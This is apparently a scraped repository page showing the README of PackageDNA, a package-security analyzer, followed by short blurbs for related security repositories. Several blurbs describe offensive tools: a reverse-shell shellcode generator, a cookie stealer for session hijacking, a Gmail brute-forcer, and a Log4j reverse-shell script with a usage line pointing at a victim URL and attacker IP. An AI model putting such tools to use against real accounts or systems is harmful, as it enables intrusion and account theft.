This tool ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information that allows them to know in advance if this library complies with processes.

Overview

PackageDNA

This tool gives developers, researchers and companies the ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information that allows them to know in advance if this library complies with processes. secure development, if currently supported, possible backdoors (malicious embedded code), typosquatting analysis, the history of versions and reported vulnerabilities (CVEs) of the package.


Installation

Clone this repository with:

git clone https://github.com/ElevenPaths/packagedna

PackageDNA uses python-magic which is a simple wrapper around the libmagic C library, and that MUST be installed as well:

Debian/Ubuntu
$ sudo apt-get install libmagic1

Windows
You will need DLLs for libmagic. @julian-r has uploaded a version of this project that includes binaries 
to PyPI: https://pypi.python.org/pypi/python-magic-bin/0.4.14
Other sources of the libraries in the past have been File for Windows. 
You will need to copy the file magic out of [binary-zip]\share\misc, and pass its location to Magic(magic_file=...).

If you are using a 64-bit build of python, you will need 64-bit libmagic binaries which can be found here: https://github.com/pidydx/libmagicwin64.
Newer version can be found here: https://github.com/nscaife/file-windows.

OSX
When using Homebrew: brew install libmagic
When using macports: port install file


More details: https://pypi.org/project/python-magic/

Run setup for installation:

python3 setup.py install --user

External Modules

PackageDNA uses external modules for its analysis that you should install previously:

Microsoft AppInpsector

https://github.com/microsoft/ApplicationInspector

Virus Total API

https://www.virustotal.com/

LibrariesIO API

https://libraries.io/

Rubocop

https://github.com/rubocop/rubocop

After installation you should configure the external modules, in the option [7] Configuration of the main menu.

[1] VirusTotal API Key: Your API KEY
[2] AppInspector absolute path: /Local/Path/MSAppInpsectorInstallation
[3] Libraries.io API Key: Your API KEY
[4] Github Token: Your Token
[B] Back
[X] Exit

NOTE: External modules are not mandatory. PackageDNA will continue its execution, however we recommend making all the configurations of these modules so that the tool performs a complete analysis

Running PackageDNA

Inside the PackageDNA directory:

./packagedna.py
_____              _                          ____     __     _  _______ 
|  __ \            | |                        |  __ \  |   \  | ||  ___  |
| |__) |__ __ ____ | | __   __ __  ____   ___ | |  \ \ | |\ \ | || |___| |
|  ___// _` |/  __)| |/ /  / _` | / _  | / _ \| |   | || | \ \| ||  ___  |
| |   | (_| || (__ | |\ \ | (_| || (_| ||  __/| |__/ / | |  \   || |   | |
|_|    \__,_|\____)|_| \_\ \__,_| \__  | \___||_____/  |_|   \__||_|   |_|
                                   __| |
                                  (____|

Modular Packages Analyzer Framework
By ElevenPaths https://www.elevenpaths.com/
Usage: python3 ./packagedna.py

[*] -------------------------------------------------------------------------------------------------------------- [*]
[!] Select from the menu:
[*] -------------------------------------------------------------------------------------------------------------- [*]
	[1] Analyze Package (Last Version)
	[2] Analyze Package (All Versions)
	[3] Analyze local package
	[4] Information gathering
	[5] Upload file and analyze all Packages
	[6] List previously analyzed packages
	[7] Configurations
	[X] Exit
[*] -------------------------------------------------------------------------------------------------------------- [*]
[!] Enter your selection: 
Owner
Telefรณnica
Telefรณnica official source code platform
Telefรณnica
Generate MIPS reverse shell shellcodes easily !

MIPS-Reverse MIPS-Reverse is a tool that can generate shellcodes for the MIPS architecture that launches a reverse shell where you can specify the IP

29 Jul 27, 2021
This repo is about steps to create a effective custom wordlist in a few clicks/

Custom Wordlist This repo is about steps to take in order to create a effective custom wordlist in a few clicks. this comes handing in pentesting enga

2 Oct 08, 2022
๐™พ๐š™๐šŽ๐š— ๐š‚๐š˜๐šž๐š›๐šŒ๐šŽ ๐š‚๐šŒ๐š›๐š’๐š™๐š - ๐™ฝ๐š˜ ๐™ฒ๐š˜๐š™๐šข๐š›๐š’๐š๐š‘๐š - ๐šƒ๐šŽ๐šŠ๐š– ๐š†๐š˜๐š›๐š” - ๐š‚๐š’๐š–๐š™๐š•๐šŽ ๐™ฟ๐šข๐š๐š‘๐š˜๐š— ๐™ฟ๐š›๐š˜๐š“๐šŽ๐šŒ๐š - ๐™ฒ๐š›๐šŽ๐šŠ๐š๐šŽ๐š ๐™ฑ๐šข : ๐™ฐ๐š•๐š• ๐šƒ๐šŽ๐šŠ๐š– - ๐™ฒ๐š˜๐š™๐šข๐™ฟ๐šŠ๐šœ๐š ๐™ฒ๐šŠ๐š— ๐™ฝ๐š˜๐š ๐™ผ๐šŠ๐š”๐šŽ ๐šˆ๐š˜๐šž ๐š๐šŽ๐šŠ๐š• ๐™ฟ๐š›๐š˜๐š๐š›๐šŠ๐š–๐š–๐šŽ๐š›

๐™พ๐š™๐šŽ๐š— ๐š‚๐š˜๐šž๐š›๐šŒ๐šŽ ๐š‚๐šŒ๐š›๐š’๐š™๐š - ๐™ฝ๐š˜ ๐™ฒ๐š˜๐š™๐šข๐š›๐š’๐š๐š‘๐š - ๐šƒ๐šŽ๐šŠ๐š– ๐š†๐š˜๐š›๐š” - ๐š‚๐š’๐š–๐š™๐š•๐šŽ ๐™ฟ๐šข๐š๐š‘๐š˜๐š— ๐™ฟ๐š›๐š˜๐š“๐šŽ๐šŒ๐š - ๐™ฒ๐š›๐šŽ๐šŠ๐š๐šŽ๐š ๐™ฑ๐šข : ๐™ฐ๐š•๐š• ๐šƒ๐šŽ๐šŠ๐š– - ๐™ฒ๐š˜๐š™๐šข๐™ฟ๐šŠ๐šœ๐š ๐™ฒ๐šŠ๐š— ๐™ฝ๐š˜๐š ๐™ผ๐šŠ๐š”๐šŽ ๐šˆ๐š˜๐šž ๐š๐šŽ๐šŠ๐š• ๐™ฟ๐š›๐š˜๐š๐š›๐šŠ๐š–๐š–๐šŽ๐š›

CodeX-ID 2 Oct 27, 2022
Searches through git repositories for high entropy strings and secrets, digging deep into commit history

truffleHog Searches through git repositories for secrets, digging deep into commit history and branches. This is effective at finding secrets accident

Truffle Security 10.1k Jan 09, 2023
Dark-Fb No Login 100% safe

Dark-Fb No Login 100% safe TERMUX โ€ข pkg install python2 && git -y โ€ข pip2 install requests mechanize tqdm โ€ข git clone https://github.com/BOT-033/Sensei

Bukan Hamkel 1 Dec 04, 2021
CVE-2022-21907 - Windows HTTPๅ่ฎฎๆ ˆ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: Windows HTTPๅ่ฎฎๆ ˆ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž creat

antx 365 Nov 30, 2022
Wonk is a tool for combining a set of AWS policy files into smaller compiled policy sets.

Wonk is a tool for combining a set of AWS policy files into smaller compiled policy sets.

Amino, Inc 140 Dec 16, 2022
Python Password Generator

This is a console-based version of a password generator written with Python. The program generates a password based on numbers of letters, numbers, and symbols specified by the user. This is a simple

p.katekomol 1 Jan 24, 2022
A Python & JavaScript Obfuscator made in Python 3.

Python Code Obfuscator A script that converts code into full on random numerical expressions. Simple Scripts: Python Mode... Input: Function that deco

Karim 3 Mar 24, 2022
xkeysnail is yet another keyboard remapping tool for X environment written in Python

xkeysnail is yet another keyboard remapping tool for X environment written in Python. It's like xmodmap but allows more flexible remappings.

Masafumi Oyamada 809 Dec 26, 2022
A fast sub domain brute tool for pentesters

subDomainsBrute 1.4 A fast sub domain brute tool for pentesters. It works with P

Oliver 2 Oct 18, 2022
A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

11 Nov 15, 2022
Big-Papa Integrates Javascript and python for remote cookie stealing which then can be used for session hijacking

Big-Papa is a remote cookie stealer which can then be used for session hijacking and Bypassing 2 Factor Authentication

77 Jan 03, 2023
Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

FaisalFs 16 Mar 24, 2022
A hack for writing switch statements with type annotations in Python.

py_annotation_switch A hack for writing switch statements in type annotations for Python. Why should I use this? You most definitely should not use th

6 Oct 17, 2021
A tool to brute force a gmail account. Use this tool to crack multiple accounts

A tool to brute force a gmail account. Use this tool to crack multiple accounts. This tool is developed to crack multiple accounts

Saad 12 Dec 30, 2022
A Fast Broken Link Hijacker Tool written in Python

Broken Link Hijacker BrokenLinkHijacker(BLH) is a Fast Broken Link Hijacker Tool written in Python.

Mayank Pandey 70 Nov 30, 2022
An automated header extensive scanner for detecting log4j RCE CVE-2021-44228

log4j An automated header extensive scanner for detecting log4j RCE CVE-2021-44228 Usage $ python3 log4j.py -l urls.txt --dns-log REPLACE_THIS.dnslog.

2 Dec 16, 2021
Threat Intelligence Gathering ๅจ่ƒๆƒ…ๆŠฅๆ”ถ้›†๏ผŒๆ—จๅœจๆ้ซ˜่“้˜Ÿๆ‹ฟๅˆฐๆ”ปๅ‡ป IP ๅŽๅฏนๅ…ถ่ฟ›่กŒๅจ่ƒๆƒ…ๆŠฅไฟกๆฏๆ”ถ้›†็š„ๆ•ˆ็އใ€‚

0x00 ไป‹็ป tig Threat Intelligence Gathering ๅจ่ƒๆƒ…ๆŠฅๆ”ถ้›†๏ผŒๆ—จๅœจๆ้ซ˜่“้˜Ÿๆ‹ฟๅˆฐๆ”ปๅ‡ป IP ๅŽๅฏนๅ…ถ่ฟ›่กŒๅจ่ƒๆƒ…ๆŠฅไฟกๆฏๆ”ถ้›†็š„ๆ•ˆ็އ๏ผŒ็›ฎๅ‰ๅทฒ้›†ๆˆๅพฎๆญฅใ€IP ๅŸŸๅๅๆŸฅใ€Fofa ไฟกๆฏๆ”ถ้›†ใ€ICP ๅค‡ๆกˆๆŸฅ่ฏขใ€IP ๅญ˜ๆดปๆฃ€ๆต‹ไบ”ไธชๆจกๅ—๏ผŒ็Žฐๅทฒๆ”ฏๆŒไปฅไธ‹ไฟกๆฏ็š„ๆŸฅ่ฏข๏ผš โœ… ๅพฎๆญฅๆ ‡็ญพ โœ… I

Wolf Group Security Team 698 Dec 09, 2022